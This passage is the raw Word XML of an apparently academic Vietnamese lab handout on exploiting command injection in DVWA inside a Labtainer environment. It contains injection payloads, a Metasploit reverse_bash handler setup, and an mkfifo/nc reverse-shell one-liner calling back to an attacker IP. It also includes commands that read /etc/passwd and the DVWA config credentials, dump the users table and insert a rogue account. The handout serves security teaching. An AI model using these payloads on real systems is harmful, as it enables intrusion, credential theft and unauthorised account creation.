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6C0D" w14:textId="77777777" w:rsidR="00D50B78" w:rsidRPr="00D50B78" w:rsidRDefault="00D50B78" w:rsidP="00D50B78">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tìm hiểu và khai thác ứng dụng DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB4DDEE"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b/>
          <w:bCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Mục đích</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B2B792"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Thông qua bài thực hành, sinh viên sẽ có cơ hội tìm hiểu chi tiết về cách khai thác và phòng chống lỗ hổng </w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Command Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> trong </w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>DVWA (Damn Vulnerable Web Application)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>. Điều này không chỉ giúp sinh viên hiểu rõ cách các cuộc tấn công khai thác lỗ hổng diễn ra mà còn cung cấp kiến thức cần thiết để bảo vệ các ứng dụng web trước loại lỗ hổng này trong thực tế.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E393A25" w14:textId="052E7D5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b/>
          <w:bCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>​​​​​​​Yêu cầu đối với sinh viên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7478A309"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Có kiến thức cơ bản về hệ điều hành Linux, ứng dụng DVWA, công cụ Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53138B60"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b/>
          <w:bCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>​​​​​​​​​​​​​​​​​​​​​Nội dung thực hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD6CC80"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Khởi động bài lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E70102F"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Vào terminal, gõ: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C29B212" w14:textId="77777777" w:rsidR="00D50B78" w:rsidRPr="00D50B78" w:rsidRDefault="00D50B78" w:rsidP="00D50B78">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>labtainer -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>r  pen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>_app_dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A10B98"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Sau khi khởi động xong hai terminal ảo sẽ xuất hiện, một cái là đại diện cho máy tấn công: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, một cái là đại diện cho máy nạn nhân: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>. Trên máy </w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, sinh viên thực hiện truy cập vào web DVWA bằng câu lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B46A2C1" w14:textId="77777777" w:rsidR="00D50B78" w:rsidRPr="00D50B78" w:rsidRDefault="00D50B78" w:rsidP="00D50B78">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ifconfig :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> để tìm ip máy chủ DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDEAC77" w14:textId="77A5E0D1" w:rsidR="00D50B78" w:rsidRPr="00D50B78" w:rsidRDefault="00D50B78" w:rsidP="00D50B78">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">firefox </w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>http://&lt;Ip server&gt;/dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8B2FB7"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Với username: admin và password: password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B25B31" w14:textId="31AE9B93"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Sau khi đăng nhập sinh viên thành công: Tìm tới phần "DVWA Security và đặt chế độ bảo mật về "Low" để dễ dàng khai thác lỗ hổng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F614D3A" w14:textId="129334BD"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 xml:space="preserve">Điều hướng đến chỉ mục Command Injection sau đó thực hiện một số payload cơ bản để khai thác lỗ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hổng :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="02DC8F87"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192.168.1.10; ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627ADF6B"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192.168.1.10; cat index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDA009D"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 xml:space="preserve">192.168.1.10; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>whoami ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C56515E" w14:textId="22C604FF"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Nếu lệnh này trả về tên người dùng hiện tại, điều đó có nghĩa là lỗ hổng đã được xác nhận và có thể khai thác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067C3DD2" w14:textId="21BA68FB"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lastRenderedPageBreak/>
        <w:t>Tiến hành khai thác, trên Máy </w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>attack </w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sinh viên sẽ sử dụng nmap để scan cổng và dịch vụ máy </w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675C5D61" w14:textId="77777777" w:rsidR="00D50B78" w:rsidRPr="00D50B78" w:rsidRDefault="00D50B78" w:rsidP="00D50B78">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo nmap -p- -sV &lt;Ip server&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D774600"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Sinh viên vào Metasploit, sử dụng module:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C56031"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use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06080AC0"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options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D911E25"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set PAYLOAD cmd/unix/reverse_bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433E6CB3"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set RHOSTR &lt;IP VICTIM&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDCE139"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set LHOST &lt;IP ATTACK&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B92B83"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set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC71854"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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FD4340"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Tạo reverse_bash và lắng nghe ip của server DVWA trên web DVWA thực hiện payload tấn công sử dụng để thiết lập reverse shell trên hệ thống mục tiêu, gửi kết nối trở lại máy </w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7909EE73" w14:textId="59A1FF3D"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Trên DVWA sinh viên nhập payload vào input của Command Injection sau đó ấn submit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0DA9E4" w14:textId="36C9A1F9" w:rsidR="00D50B78" w:rsidRPr="00D50B78" w:rsidRDefault="00D50B78" w:rsidP="00D50B78">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&lt;IP server&gt;; rm /tmp/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>f;mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>f;cat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp/f|/bin/bash -i 2&gt;&amp;1|nc &lt;IP attack&gt; 4444 &gt;/tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B49E5" w14:textId="6E945673"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Khi kết nối reverse shell thành công</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> sinh viên sử dụng các câu lệnh sau, để khám phá thông tin xác thực của người dùng và thông tin xác thực của cơ sở dữ liệu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8ECDA0"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whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A73617E"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grep www-data /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47700DF8"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grep www-data /etc/group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D4ABDA"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ls -l /var/www/html/dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D18BFB"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ls -l /var/www/html/dvwa/config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F40875"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cat /var/www/html/dvwa/config/config.inc.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF53609"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Sinh viên sử dụng các câu lệnh sau, để hiển thị thông tin cơ sở dữ liệu DVWA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C26E6B0"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echo "show databases;" | mysql -u &lt;user&gt; -p&lt;password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6CCBAC"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echo "use dvwa; show tables;" | mysql -u &lt;user&gt; -p&lt;password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CE683D"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lastRenderedPageBreak/>
        <w:t>echo "use dvwa; desc users;" | mysql -u &lt;user&gt; -p&lt;password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5481D595"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rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "select * from </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>dvwa.users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>;" | mysql -u &lt;user&gt; -p&lt;password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EBA4C6" w14:textId="4BC57363"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Sinh viên tạo người dùng mới có username và password là </w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> password123</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> với các thuộc tính còn lại tùy ý trong bảng </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>dvwa.users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EDA40C" w14:textId="77777777" w:rsidR="00D50B78" w:rsidRDefault="00D50B78" w:rsidP="00D50B78">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "INSERT INTO </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>dvwa.users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (“&lt;&lt;các trường trong bảng user&gt;&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>")  VALUES</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (“&lt;&lt;các trường trong bảng user&gt;&gt;");" | mysql -u &lt;user&gt; -p&lt;password&gt; &lt;database_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6743C7" w14:textId="42CA60BA"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Kiểm tra xem đã thêm thành công người dùng mới chưa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFE9F8B" w14:textId="500A41CA" w:rsidR="00D50B78" w:rsidRPr="00D50B78" w:rsidRDefault="00D50B78" w:rsidP="00D50B78">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "select * from </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>dvwa.users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">;" </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>|  mysql</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u &lt;user&gt; -p&lt;password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3B7E86"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Kết thúc bài lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5171AB27"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Trên terminal đầu tiên sử dụng câu lệnh sau để kết thúc bài lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BFD428" w14:textId="77777777" w:rsidR="00D50B78" w:rsidRPr="00D50B78" w:rsidRDefault="00D50B78" w:rsidP="00D50B78">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
